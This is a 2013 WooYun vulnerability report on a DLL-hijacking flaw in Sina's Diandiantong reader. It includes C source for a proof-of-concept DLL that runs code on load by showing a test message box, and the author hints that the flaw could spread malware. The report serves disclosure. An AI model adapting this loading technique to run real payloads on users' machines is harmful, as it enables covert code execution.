当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021897

漏洞标题:新浪点点通阅读器dll加载漏洞

相关厂商:新浪

漏洞作者: zhq445078388

提交时间:2013-04-15 19:26

修复时间:2013-04-20 19:26

公开时间:2013-04-20 19:26

漏洞类型:非授权访问/认证绕过

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-15: 细节已通知厂商并且等待厂商处理中
2013-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

新浪点点通阅读器存在一处dll加载漏洞

详细说明:

今天想把谷歌reader给换掉..找到了一个"新浪点点通"阅读器
照常..先把结构分析下..
然后....
ddtupdate.dll
发现了这货
第一时间看看是不是倒入表的..
发现.这货不是倒入表的,然后发现这个dll居然没签名
好吧!! 又一个!
测试下

漏洞证明:

#include "windows.h"
BOOL main_dll(void);


#include "dll_zhuru.h"
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:main_dll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
BOOL main_dll(void){
MessageBoxA(NULL,"测试性弹窗,此弹窗弹出表示代码得到执行","测试",MB_OK);
return TRUE;
};


QQ截图20130415155741.jpg


虽然随后弹出了

QQ截图20130415155814.jpg


但是其实代码已经得到执行了
不知道这个在新浪眼里算不算安全问题..
不过在我这里感觉已经很严重了.又一个可以用来传"实物图"的洞啊~

修复方案:

load时候判断下~ 最好打签名..

版权声明:转载请注明来源 zhq445078388@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-20 19:26

厂商回复:

最新状态:

暂无